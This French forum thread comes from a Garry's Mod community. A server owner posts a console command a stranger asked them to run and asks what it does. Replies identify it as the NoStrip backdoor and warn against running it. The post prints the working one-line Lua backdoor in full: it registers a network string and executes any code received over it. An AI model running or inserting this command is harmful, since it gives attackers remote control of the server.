COMMANDE

• Initiateur de la discussion
Vitaith

Vitaith

Bambi
Score réaction
5
Bonjour, un personne et venu sur mon serveur et ma dit mais cette commande la dans ta console et avec ulx luarun "command"

Je ne sais pas ce quelle fait c'est pour sa que je la mais la pour savoir a quoi elle serre ne l"utilisé pas si vous ne la connaissez pas

ulx luarun util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)

Merci de me dire ce que sa fait :p

MrSkiziz

MrSkiziz

Geek suprême
Score réaction
231
https://gmod.facepunch.com/f/gmodde...around-gmod-found-this-any-fixes/1/#postevkgx

Vitaith

Vitaith

Bambi
Score réaction
5
MrSkiziz à dit:
Ok merci j'ai bien fait de pas la faire et elle aurais faire quoi la commande ? ( je connais rien en backdoor )

xXMad93

xXMad93

Geek
Score réaction
1
S
Vitaith à dit:
Ok merci j'ai bien fait de pas la faire et elle aurais faire quoi la commande ? ( je connais rien en backdoor )
Si je me trompe pas, il aurait pu contrôle ton serveur et donc lancer n'importe quel commande.

Définition de @FalkioGMR plus précise : Une backdoor est un petit code maliceux qui consiste à créer une ou plusieurs failles dans votre serveur qui peut permettre de déban tous le monde, mettre qui tapera une commande dans F10 sera superadmin etc... ALORS ATTENTION

ÉDIT le 7 janvier 2018 à 20h22

Dernière édition:
Vitaith

Vitaith

Bambi
Score réaction
5
xXMad93 à dit:
S

Si je me trompe pas, il aurait pu contrôle ton serveur et donc lancer n'importe quel commande.

Définition de @FalkioGMR plus précise : Une backdoor est un petit code maliceux qui consiste à créer une ou plusieurs failles dans votre serveur qui peut permettre de déban tous le monde, mettre qui tapera une commande dans F10 sera superadmin etc... ALORS ATTENTION

ÉDIT le 7 janvier 2018 à 20h22
Ok merci beaucoup ! :)

Solo

Solo

Suka le gentil
Score réaction
0
J'arrive un peu tard, mais c'est la fameuse BackDoor NoStrip ( très connue ). Ne lance pas cette commande

BCZ Gaming

BCZ Gaming

Psychopathe
Score réaction
129
Solo à dit:
J'arrive un peu tard, mais c'est la fameuse BackDoor NoStrip ( très connue ). Ne lance pas cette commande
Up une disctuion de 2018 srx? ...

MrHetairy

MrHetairy

Têtard
Score réaction
0
Solo à dit:
En gros elle marche comment ?

Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Score réaction
9 686
Discord d'entraide
Rejoignz-nous sur Discord